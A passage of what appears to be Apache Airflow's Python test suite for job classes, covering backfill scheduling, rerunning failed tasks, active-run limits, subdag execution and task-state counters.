from airflow.operators.dummy_operator import DummyOperator
from airflow.task.task_runner.base_task_runner import BaseTaskRunner
from airflow.utils import timezone
from airflow.utils.dag_processing import SimpleDag, SimpleDagBag, list_py_file_paths
from airflow.utils.dates import days_ago
from airflow.utils.db import provide_session
from airflow.utils.net import get_hostname
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from tests.core import TEST_DAG_FOLDER
from tests.executors.test_executor import TestExecutor
configuration.load_test_config()
logger = logging.getLogger(__name__)
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
DEV_NULL = '/dev/null'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TRY_NUMBER = 1
# Include the words "airflow" and "dag" in the file contents,
# tricking airflow into thinking these
# files contain a DAG (otherwise Airflow will skip them)
PARSEABLE_DAG_FILE_CONTENTS = '"airflow DAG"'
UNPARSEABLE_DAG_FILE_CONTENTS = 'airflow DAG'
# Filename to be used for dags that are created in an ad-hoc manner and can be removed/
# created at runtime
TEMP_DAG_FILENAME = "temp_dag.py"
TEST_DAGS_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
class BaseJobTest(unittest.TestCase):
class TestJob(BaseJob):
__mapper_args__ = {
'polymorphic_identity': 'TestJob'
}
def __init__(self, cb):
self.cb = cb
super(BaseJobTest.TestJob, self).__init__()
def _execute(self):
return self.cb()
def test_state_success(self):
job = self.TestJob(lambda: True)
job.run()
self.assertEqual(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_sysexit(self):
import sys
job = self.TestJob(lambda: sys.exit(0))
job.run()
self.assertEqual(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_failed(self):
def abort():
raise RuntimeError("fail")
job = self.TestJob(abort)
with self.assertRaises(RuntimeError):
job.run()
self.assertEqual(job.state, State.FAILED)
self.assertIsNotNone(job.end_date)
class BackfillJobTest(unittest.TestCase):
def setUp(self):
with create_session() as session:
session.query(models.DagRun).delete()
session.query(models.Pool).delete()
session.query(models.TaskInstance).delete()
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(include_examples=True)
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_trigger_controller_dag(self):
dag = self.dagbag.get_dag('example_trigger_controller_dag')
target_dag = self.dagbag.get_dag('example_trigger_target_dag')
dag.clear()
target_dag.clear()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertFalse(queue.append.called)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True
)
job.run()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertTrue(queue.append.called)
target_dag.clear()
dag.clear()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_multi_dates(self):
dag = self.dagbag.get_dag('example_bash_operator')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
ignore_first_depends_on_past=True
)
job.run()
session = settings.Session()
drs = session.query(DagRun).filter(
DagRun.dag_id == 'example_bash_operator'
).order_by(DagRun.execution_date).all()
self.assertTrue(drs[0].execution_date == DEFAULT_DATE)
self.assertTrue(drs[0].state == State.SUCCESS)
self.assertTrue(drs[1].execution_date ==
DEFAULT_DATE + datetime.timedelta(days=1))
self.assertTrue(drs[1].state == State.SUCCESS)
dag.clear()
session.close()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_examples(self):
"""
Test backfilling example dags
Try to backfill some of the example dags. Be careful, not all dags are suitable
for doing this. For example, a dag that sleeps forever, or does not have a
schedule won't work here since you simply can't backfill them.
"""
include_dags = {
'example_branch_operator',
'example_bash_operator',
'example_skip_dag',
'latest_only'
}
dags = [
dag for dag in self.dagbag.dags.values()
if 'example_dags' in dag.full_filepath and dag.dag_id in include_dags
]
for dag in dags:
dag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# Make sure that we have the dags that we want to test available
# in the example_dags folder, if this assertion fails, one of the
# dags in the include_dags array isn't available anymore
self.assertEqual(len(include_dags), len(dags))
for i, dag in enumerate(sorted(dags, key=lambda d: d.dag_id)):
logger.info('*** Running example DAG #{}: {}'.format(i, dag.dag_id))
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True)
job.run()
def test_backfill_conf(self):
dag = DAG(
dag_id='test_backfill_conf',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='op',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
conf = json.loads("""{"key": "value"}""")
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
conf=conf)
job.run()
dr = DagRun.find(dag_id='test_backfill_conf')
self.assertEqual(conf, dr[0].conf)
def test_backfill_run_rescheduled(self):
dag = DAG(
dag_id='test_backfill_run_rescheduled',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_run_rescheduled_task-1',
dag=dag,
)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UP_FOR_RESCHEDULE)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_upstream_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_upstream_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
t1 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-1',
dag=dag)
t2 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-2',
dag=dag)
t1.set_upstream(t2)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UPSTREAM_FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks_without_flag(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=False
)
with self.assertRaises(AirflowException):
job.run()
def test_backfill_ordered_concurrent_execute(self):
dag = DAG(
dag_id='test_backfill_ordered_concurrent_execute',
start_date=DEFAULT_DATE,
schedule_interval="@daily")
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
# test executor history keeps a list
history = executor.history
# check if right order. Every loop has a 'pause' (0) to change state
# from RUNNING to SUCCESS.
# 6,0,3,0,3,0,3,0 = 8 loops
self.assertEqual(8, len(history))
loop_count = 0
while len(history) > 0:
queued_tasks = history.pop(0)
if loop_count == 0:
# first loop should contain 6 tasks (3 days x 2 tasks)
self.assertEqual(6, len(queued_tasks))
if loop_count == 2 or loop_count == 4 or loop_count == 6:
# 3 days x 1 task
self.assertEqual(3, len(queued_tasks))
loop_count += 1
def test_backfill_pooled_tasks(self):
"""
Test that queued tasks are executed by BackfillJob
"""
session = settings.Session()
pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
session.add(pool)
session.commit()
dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# run with timeout because this creates an infinite loop if not
# caught
with timeout(seconds=30):
job.run()
ti = TI(
task=dag.get_task('test_backfill_pooled_task'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_depends_on_past(self):
"""
Test that backfill respects ignore_depends_on_past
"""
dag = self.dagbag.get_dag('test_depends_on_past')
dag.clear()
run_date = DEFAULT_DATE + datetime.timedelta(days=5)
# backfill should deadlock
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
BackfillJob(dag=dag, start_date=run_date, end_date=run_date).run)
BackfillJob(
dag=dag,
start_date=run_date,
end_date=run_date,
ignore_first_depends_on_past=True).run()
# ti should have succeeded
ti = TI(dag.tasks[0], run_date)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_run_ignores_all_dependencies(self):
"""
Test that run respects ignore_all_dependencies
"""
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
DEFAULT_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=DEFAULT_DATE)
ti_dependent0.refresh_from_db()
self.assertEqual(ti_dependent0.state, State.FAILED)
task1_id = 'test_run_dependency_task'
args1 = ['run',
'-A',
dag_id,
task1_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args1))
ti_dependency = TI(
task=dag.get_task(task1_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependency.refresh_from_db()
self.assertEqual(ti_dependency.state, State.FAILED)
task2_id = 'test_run_dependent_task'
args2 = ['run',
'-A',
dag_id,
task2_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args2))
ti_dependent = TI(
task=dag.get_task(task2_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependent.refresh_from_db()
self.assertEqual(ti_dependent.state, State.SUCCESS)
def test_run_naive_taskinstance(self):
"""
Test that we can run naive (non-localized) task instances
"""
NAIVE_DATE = datetime.datetime(2016, 1, 1)
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
NAIVE_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=NAIVE_DATE)
ti_dependent0.refresh_from_db()
self.assertEqual(ti_dependent0.state, State.FAILED)
def test_cli_backfill_depends_on_past(self):
"""
Test that CLI respects -I argument
"""
dag_id = 'test_dagrun_states_deadlock'
run_date = DEFAULT_DATE + datetime.timedelta(days=1)
args = [
'backfill',
dag_id,
'-l',
'-s',
run_date.isoformat(),
]
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
cli.backfill,
self.parser.parse_args(args))
cli.backfill(self.parser.parse_args(args + ['-I']))
ti = TI(dag.get_task('test_depends_on_past'), run_date)
ti.refresh_from_db()
# task ran
self.assertEqual(ti.state, State.SUCCESS)
dag.clear()
def test_cli_backfill_depends_on_past_backwards(self):
"""
Test that CLI respects -B argument and raises on interaction with depends_on_past
"""
dag_id = 'test_depends_on_past'
start_date = DEFAULT_DATE + datetime.timedelta(days=1)
end_date = start_date + datetime.timedelta(days=1)
args = [
'backfill',
dag_id,
'-l',
'-s',
start_date.isoformat(),
'-e',
end_date.isoformat(),
'-I'
]
dag = self.dagbag.get_dag(dag_id)
dag.clear()
cli.backfill(self.parser.parse_args(args + ['-I']))
ti = TI(dag.get_task('test_dop_task'), end_date)
ti.refresh_from_db()
# runs fine forwards
self.assertEqual(ti.state, State.SUCCESS)
# raises backwards
expected_msg = 'You cannot backfill backwards because one or more tasks depend_on_past: {}'.format(
'test_dop_task')
self.assertRaisesRegexp(
AirflowException,
expected_msg,
cli.backfill,
self.parser.parse_args(args + ['-B']))
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay_on_limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
self.assertEqual(0.5, parsed_args.delay_on_limit)
def _get_dag_test_max_active_limits(self, dag_id, max_active_runs=1):
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval="@hourly",
max_active_runs=max_active_runs
)
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
dag.clear()
return dag
def test_backfill_max_limit_check_within_limit(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_within_limit',
max_active_runs=16)
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
dagruns = DagRun.find(dag_id=dag.dag_id)
self.assertEqual(2, len(dagruns))
self.assertTrue(all([run.state == State.SUCCESS for run in dagruns]))
def test_backfill_max_limit_check(self):
dag_id = 'test_backfill_max_limit_check'
run_id = 'test_dagrun'
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
dag_run_created_cond = threading.Condition()
def run_backfill(cond):
cond.acquire()
try:
dag = self._get_dag_test_max_active_limits(dag_id)
# this session object is different than the one in the main thread
thread_session = settings.Session()
# Existing dagrun that is not within the backfill range
dag.create_dagrun(
run_id=run_id,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
start_date=DEFAULT_DATE,
)
thread_session.commit()
cond.notify()
finally:
cond.release()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
thread_session.close()
backfill_job_thread = threading.Thread(target=run_backfill,
name="run_backfill",
args=(dag_run_created_cond,))
dag_run_created_cond.acquire()
session = settings.Session()
backfill_job_thread.start()
try:
# at this point backfill can't run since the max_active_runs has been
# reached, so it is waiting
dag_run_created_cond.wait(timeout=1.5)
dagruns = DagRun.find(dag_id=dag_id)
dr = dagruns[0]
self.assertEqual(1, len(dagruns))
self.assertEqual(dr.run_id, run_id)
# allow the backfill to execute by setting the existing dag run to SUCCESS,
# backfill will execute dag runs 1 by 1
dr.set_state(State.SUCCESS)
session.merge(dr)
session.commit()
session.close()
backfill_job_thread.join()
dagruns = DagRun.find(dag_id=dag_id)
self.assertEqual(3, len(dagruns)) # 2 from backfill + 1 existing
self.assertEqual(dagruns[-1].run_id, dr.run_id)
finally:
dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_no_count_existing')
start_date = DEFAULT_DATE
end_date = DEFAULT_DATE
# Existing dagrun that is within the backfill range
dag.create_dagrun(run_id="test_existing_backfill",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
# BackfillJob will run since the existing DagRun does not count for the max
# active limit since it's within the backfill date range.
dagruns = DagRun.find(dag_id=dag.dag_id)
# will only be able to run 1 (the existing one) since there's just
# one dag run slot left given the max_active_runs limit
self.assertEqual(1, len(dagruns))
self.assertEqual(State.SUCCESS, dagruns[0].state)
def test_backfill_max_limit_check_complete_loop(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_complete_loop')
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
# Given the max limit to be 1 in active dag runs, we need to run the
# backfill job 3 times
success_expected = 2
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
self.assertEqual(success_expected, success_dagruns)
self.assertEqual(0, running_dagruns) # no dag_runs in running state are left
def test_sub_set_subdag(self):
dag = DAG(
'test_sub_set_subdag',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
sub_dag = dag.sub_dag(task_regex="leave*",
include_downstream=False,
include_upstream=False)
job = BackfillJob(dag=sub_dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
job.run()
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(BackfillJob.ID_FORMAT_PREFIX.format(DEFAULT_DATE.isoformat()),
dr.run_id)
for ti in dr.get_task_instances():
if ti.task_id == 'leave1' or ti.task_id == 'leave2':
self.assertEqual(State.SUCCESS, ti.state)
else:
self.assertEqual(State.NONE, ti.state)
def test_backfill_fill_blanks(self):
dag = DAG(
'test_backfill_fill_blanks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'},
)
with dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2')
op3 = DummyOperator(task_id='op3')
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
op6 = DummyOperator(task_id='op6')
dag.clear()
dr = dag.create_dagrun(run_id='test',
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
session = settings.Session()
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == op1.task_id:
ti.state = State.UP_FOR_RETRY
ti.end_date = DEFAULT_DATE
elif ti.task_id == op2.task_id:
ti.state = State.FAILED
elif ti.task_id == op3.task_id:
ti.state = State.SKIPPED
elif ti.task_id == op4.task_id:
ti.state = State.SCHEDULED
elif ti.task_id == op5.task_id:
ti.state = State.UPSTREAM_FAILED
# op6 = None
session.merge(ti)
session.commit()
session.close()
job = BackfillJob(dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
self.assertRaisesRegexp(
AirflowException,
'Some task instances failed',
job.run)
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(dr.state, State.FAILED)
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == op2.task_id:
self.assertEqual(ti.state, State.FAILED)
elif ti.task_id == op3.task_id:
self.assertEqual(ti.state, State.SKIPPED)
elif ti.task_id == op5.task_id:
self.assertEqual(ti.state, State.UPSTREAM_FAILED)
def test_backfill_execute_subdag(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
start_date = timezone.utcnow()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=start_date,
end_date=start_date,
executor=executor,
donot_pickle=True)
job.run()
history = executor.history
subdag_history = history[0]
# check that all 5 task instances of the subdag 'section-1' were executed
self.assertEqual(5, len(subdag_history))
for sdh in subdag_history:
ti = sdh[3]
self.assertIn('section-1-task-', ti.task_id)
subdag.clear()
dag.clear()
def test_subdag_clear_parentdag_downstream_clear(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
with timeout(seconds=30):
job.run()
ti0 = TI(
task=subdag.get_task('section-1-task-1'),
execution_date=DEFAULT_DATE)
ti0.refresh_from_db()
self.assertEqual(ti0.state, State.SUCCESS)
sdag = subdag.sub_dag(
task_regex='section-1-task-1',
include_downstream=True,
include_upstream=False)
sdag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
include_parentdag=True)
ti0.refresh_from_db()
self.assertEqual(State.NONE, ti0.state)
ti1 = TI(
task=dag.get_task('some-other-task'),
execution_date=DEFAULT_DATE)
self.assertEqual(State.NONE, ti1.state)
# Checks that all the Downstream tasks for Parent DAG
# have been cleared
for task in subdag_op_task.downstream_list:
ti = TI(
task=dag.get_task(task.task_id),
execution_date=DEFAULT_DATE
)
self.assertEqual(State.NONE, ti.state)
subdag.clear()
dag.clear()
def test_backfill_execute_subdag_with_removed_task(self):
"""
Ensure that subdag operators execute properly in the case where
an associated task of the subdag has been removed from the dag
definition, but has instances in the database from previous runs.
"""
dag = self.dagbag.get_dag('example_subdag_operator')
subdag = dag.get_task('section-1').subdag
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
removed_task_ti = TI(
task=DummyOperator(task_id='removed_task'),
execution_date=DEFAULT_DATE,
state=State.REMOVED)
removed_task_ti.dag_id = subdag.dag_id
session = settings.Session()
session.merge(removed_task_ti)
with timeout(seconds=30):
job.run()
for task in subdag.tasks:
instance = session.query(TI).filter(
TI.dag_id == subdag.dag_id,
TI.task_id == task.task_id,
TI.execution_date == DEFAULT_DATE).first()
self.assertIsNotNone(instance)
self.assertEqual(instance.state, State.SUCCESS)
removed_task_ti.refresh_from_db()
self.assertEqual(removed_task_ti.state, State.REMOVED)
subdag.clear()
dag.clear()
def test_update_counters(self):
dag = DAG(
dag_id='test_manage_executor_state',
start_date=DEFAULT_DATE)
task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
job = BackfillJob(dag=dag)
session = settings.Session()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task1, dr.execution_date)
ti.refresh_from_db()
ti_status = BackfillJob._DagRunTaskStatus()
# test for success
ti.set_state(State.SUCCESS, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 1)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.succeeded.clear()
# test for skipped
ti.set_state(State.SKIPPED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 1)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.skipped.clear()
# test for failed
ti.set_state(State.FAILED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 1)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.failed.clear()
# test for retry
ti.set_state(State.UP_FOR_RETRY, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
# test for reschedule
ti.set_state(State.UP_FOR_RESCHEDULE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
# test for none
ti.set_state(State.NONE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
session.close()
def test_dag_get_run_dates(self):
def get_test_dag_for_backfill(schedule_interval=None):
dag = DAG(
dag_id='test_get_dates',
start_date=DEFAULT_DATE,
schedule_interval=schedule_interval)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
)
return dag
test_dag = get_test_dag_for_backfill()
self.assertEqual([DEFAULT_DATE], test_dag.get_run_dates(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE))
test_dag = get_test_dag_for_backfill(schedule_interval="@hourly")
self.assertEqual([DEFAULT_DATE - datetime.timedelta(hours=3),
DEFAULT_DATE - datetime.timedelta(hours=2),
DEFAULT_DATE - datetime.timedelta(hours=1),
DEFAULT_DATE],
test_dag.get_run_dates(
start_date=DEFAULT_DATE - datetime.timedelta(hours=3),
end_date=DEFAULT_DATE,))
def test_backfill_run_backwards(self):
dag = self.dagbag.get_dag("test_start_date_scheduling")
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
run_backwards=True
)
job.run()
session = settings.Session()
tis = session.query(TI).filter(
TI.dag_id == 'test_start_date_scheduling' and TI.task_id == 'dummy'
).order_by(TI.execution_date).all()
queued_times = [ti.queued_dttm for ti in tis]
self.assertTrue(queued_times == sorted(queued_times, reverse=True))
self.assertTrue(all([ti.state == State.SUCCESS for ti in tis]))
dag.clear()
session.close()
class LocalTaskJobTest(unittest.TestCase):
def setUp(self):
pass
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
